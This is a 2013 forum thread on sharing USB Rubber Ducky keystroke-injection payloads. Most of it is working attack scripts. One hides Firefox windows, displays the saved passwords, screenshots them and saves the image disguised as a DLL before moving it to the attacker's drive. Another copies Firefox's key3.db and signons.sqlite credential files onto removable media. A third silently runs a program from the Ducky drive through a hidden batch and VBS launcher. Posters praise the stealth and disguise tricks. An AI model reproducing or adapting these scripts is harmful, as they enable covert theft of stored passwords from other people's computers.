chickentech Posted January 28, 2013 Share Posted January 28, 2013 Hey guys & gals- I'm fairly new to the forum here, but I'm surprised at the number of shared payloads.. Can some of you share your cool scripts? Feel free to generalize server addresses and specifics, but I have to think that there are a lot more out there than are in the github... I know I would really appreciate it - and I'm sure others would as well. Thanks in advance!! (and when I finally get something good, I'll be sure to return the favor!) Quote Link to comment Share on other sites More sharing options...
no42 Posted January 28, 2013 Share Posted January 28, 2013 Most are here: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads Quote Link to comment Share on other sites More sharing options...
chickentech Posted January 28, 2013 Author Share Posted January 28, 2013 As I said in my post - I find this to be such a small number of payloads - surprised really that there aren't more.. Quote Link to comment Share on other sites More sharing options...
Splosh Posted January 31, 2013 Share Posted January 31, 2013 (edited) Firefox plaintext password stealer I utilized Overwraith's (?) windows hiding feature and figured the rest out through trial and error. The script tries to be as stealthy as possible about what's happening, but that slows down the run speed from 12s to 15s and to it may look even more suspicious when windows are trying to hide themselves. The Hiding sections are separated with comments so you can remove them rather easily. The delay times are somewhat strict, you may need to do play with them to make it work on a slower machine. I went for tab + arrow navigation to make it more suitable for multi-lingual use compared to alt+letter navigation. I had some problems with REM and REPEAT commands (Used the Duck Encoder 2.2 and naked Duck version 2 firmware) so the code has been stripped from the hundreds of DOWNARROW commands. Things to keep in mind If firefox starts in full screen mode it won't hide itself. The script however still does what it needs to. The navigation to settings assumes the browser is using firefox default start page (with six quick navigation icons in the bottom). If the target machine is using custom home-page, for en_US browser change "Within FF, scroll to settings" to ALT T Delay 50 STRING O DELAY 200 If the passwords saved in firefox are secured with master password, the script simply won't work. Important Firefox memorizes the last settings-tab used. AFAIK Ducky can't navigate to a specific tab but it can scroll in between them so make sure settings were closed with the general tab open before running the script. Otherwise you'll end up with an image of language settings or worse. This is the first bigger one I've made so feedback is appreciated ^_^ The Script REM I had some problems with the first commands after firmware upgrade so as a lazy solution I run meaningles stuff first GUI R DELAY 50 ALT F4 DELAY 50 REM Open firefox GUI R DELAY 50 STRING firefox ENTER REM FF Load delay: needs to be at least as long as the firefox startup time. DELAY 500 DELAY 500 DELAY 500 DELAY 500 REM Hide the window ALT SPACE STRING M DELAY 10 DOWNARROW REPEAT 100 DELAY 300 ENTER REM Within FF, scroll to settings DELAY 300 TAB DELAY 5 TAB DELAY 5 TAB DELAY 5 TAB DELAY 5 TAB DELAY 5 TAB DELAY 5 TAB DELAY 5 TAB DELAY 5 ENTER DELAY 200 REM Hide settings window ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER REM Scroll Security tab and then highlight and open "Saved Passwords..." LEFTARROW DELAY 10 LEFTARROW DELAY 10 LEFTARROW DELAY 10 SHIFT TAB DELAY 10 SHIFT TAB DELAY 10 SHIFT TAB DELAY 10 SHIFT TAB ENTER REM Enable "Show Passwords" DELAY 200 TAB DELAY 10 TAB DELAY 10 TAB DELAY 10 ENTER DELAY 100 ENTER REM Maximize password window and take a print screen ALT SPACE DELAY 10 UPARROW DELAY 10 UPARROW DELAY 10 ENTER DELAY 50 PRINTSCREEN REM Return window-size back to normal, close window, nagivate back to general tab and close settings ALT SPACE DELAY 10 ENTER DELAY 50 ALT F4 DELAY 10 TAB DELAY 50 TAB DELAY 50 TAB DELAY 50 TAB DELAY LEFTARROW DELAY 50 LEFTARROW DELAY 50 LEFTARROW DELAY 50 LEFTARROW DELAY 50 LEFTARROW DELAY 50 ALT F4 DELAY 50 ALT F4 DELAY 50 REM Open paint, paste the image and save it as a DLL lookalike just in case it doesn't disappear from users computer: DLL's are common and not usually opened. Also they won't arouse that much suspicion on attackers USB-drive. GUI R DELAY 50 STRING pbrush DELAY 10 ENTER DELAY 200 CTRL V DELAY 200 CTRL S DELAY 200 STRING %homedrive%\Users\%username%\thumbnails.dll DELAY 10 ENTER REM In case file already exists, overwrite LEFTARROW ENTER REM Close paint and take a print screen of desktop to get rid of password-image on clipboard ALT F4 DELAY 10 PRINTSCREEN DELAY 10 REM Open CMD-promt and hide it GUI R DELAY 10 STRING cmd DELAY 10 ENTER DELAY 200 REM Hide the CMD window ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER DELAY 10 REM Move the file to external media REM This was a tricky part since it's hard to predict the directory. The script first tries a reasonable prediction for "highest" drive letter on machine (H:\), that was probably assigned to attacker's external media inserted the last. REM It then reruns the MOVE command scrolling drive letters backwards one by one in the alphabet. If H: doesn't exist, cmd just returns "The system cannot find the drive specified". REM If G: does exist, the file is moved there (cmd returns "1 file(s) moved".) and it no longer can be copied on F:, E: or D:. In those cases cmd returns "The system cannot find the file specified". STRING MOVE /Y %homedrive%\Users\%username%\thumbnails.dll H: DELAY 50 ENTER REM Try drive-letter G DELAY 10 UPARROW LEFTARROW BACKSPACE STRING G ENTER REM Try drive-letter F DELAY 10 UPARROW LEFTARROW BACKSPACE STRING F ENTER REM Try drive-letter E DELAY 50 UPARROW LEFTARROW BACKSPACE STRING E ENTER REM Try drive-letter D DELAY 50 UPARROW LEFTARROW BACKSPACE STRING D ENTER REM Exit the cmd DELAY 10 STRING exit ENTER REM Finally, hide what has been written on run... window last time it was used, note that the run history remains REM but one rarely bothers to use the drop down menu when hands are all the way away from mouse. REM The reason I didn't use Overwraith's argumented cmd earlier was this: it looks more suspicious in the drop down menu aswell. DELAY 10 GUI R DELAY 10 STRING notepad DELAY 10 ENTER DELAY 50 ALT F4 REM When you're done, rename the thumbnails.dll to ffpwd.png (or the name of your choosing) and open the image file. Edited February 6, 2013 by midnitesnake Corrected Formatting Quote Link to comment Share on other sites More sharing options...
Shark3y Posted January 31, 2013 Share Posted January 31, 2013 I did a similar script for OSX and when it comes to firefox, stealing the key3.db and signons.sqlite files seems to be quicker, though the method you use is definitely ingenious. I especially like the saving image file as dll. Very crafty. Quote Link to comment Share on other sites More sharing options...
Splosh Posted February 1, 2013 Share Posted February 1, 2013 (edited) I did a similar script for OSX and when it comes to firefox, stealing the key3.db and signons.sqlite files seems to be quicker, though the method you use is definitely ingenious. I especially like the saving image file as dll. Very crafty. This works much better. Huge thanks to You! Here's my script GUI R DELAY 100 STRING cmd ENTER DELAY 150 STRING cd %homepath%/AppData/Roaming/Mozilla/Firefox/Profiles ENTER STRING cd SPACE TAB ENTER STRING COPY key3.db %homepath%\Contacts ENTER STRING COPY signons.sqlite %homepath%\Contacts ENTER STRING MOVE /Y %homepath%\Contacts\key3.db G: ENTER UPARROW LEFTARROW BACKSPACE STRING F ENTER UPARROW LEFTARROW BACKSPACE STRING E ENTER UPARROW LEFTARROW BACKSPACE STRING D ENTER STRING MOVE /Y %homepath%\Contacts\signons.sqlite G: ENTER DELAY 200 UPARROW LEFTARROW BACKSPACE STRING F ENTER DELAY 200 UPARROW LEFTARROW BACKSPACE STRING E ENTER DELAY 200 UPARROW LEFTARROW BACKSPACE STRING D ENTER DELAY 200 STRING exit ENTER Edited February 6, 2013 by midnitesnake Corrected Formatting Quote Link to comment Share on other sites More sharing options...
Maclover25 Posted July 2, 2013 Share Posted July 2, 2013 We should have just one section where people can put their payloads so you don't have to look all over for payloads. Quote Link to comment Share on other sites More sharing options...
overwraith Posted July 2, 2013 Share Posted July 2, 2013 (edited) We should have just one section where people can put their payloads so you don't have to look all over for payloads. Somebody suggested it once, but nobody ever implemented it. Wrote this the other night, auto runs a Java class file located on the Ducky SD. Twin duck firmware. Class name is JavaApp, will need renamed to whatever the name of the Java application is. I don't know if Java can even be used for hacking, but it can be used for stuff like making sockets, and directory walking stuff. REM Author: overwraith REM Name: Java_Application.txt REM Purpose: Run a java application off the ducky drive after it mounts. REM Encoder V2.4 REM Using the run command for a broader OS base. DEFAULT_DELAY 25 DELAY 3000 GUI R DELAY 1000 STRING cmd /Q /D /T:7F /F:OFF /V:ON /K DELAY 500 ENTER DELAY 750 ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER REM Change directories because System32 appears to be protected. STRING CD %TEMP% ENTER REM Make batch file that waits for SD card to mount. REM Delete batch file if already exists STRING erase /Q DuckyWait.bat ENTER STRING copy con DuckyWait.bat ENTER REM DuckyWait.bat STRING :while1 ENTER STRING for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A:) ENTER STRING if Exist %DUCKYdrive% ( ENTER STRING goto :break ENTER STRING ) ENTER STRING timeout /t 30 ENTER STRING goto :while1 ENTER STRING :break ENTER REM Continue script. STRING %DUCKYdrive% ENTER STRING cd Java_Application ENTER STRING Java JavaApp ENTER CONTROL z ENTER REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY. REM Delete vbs file if already exists STRING erase /Q invis.vbs ENTER REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up STRING copy con invis.vbs ENTER STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False ENTER CONTROL Z ENTER REM RUN THE BATCH FILE STRING wscript.exe invis.vbs DuckyWait.bat ENTER STRING EXIT ENTER Edited July 2, 2013 by overwraith Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.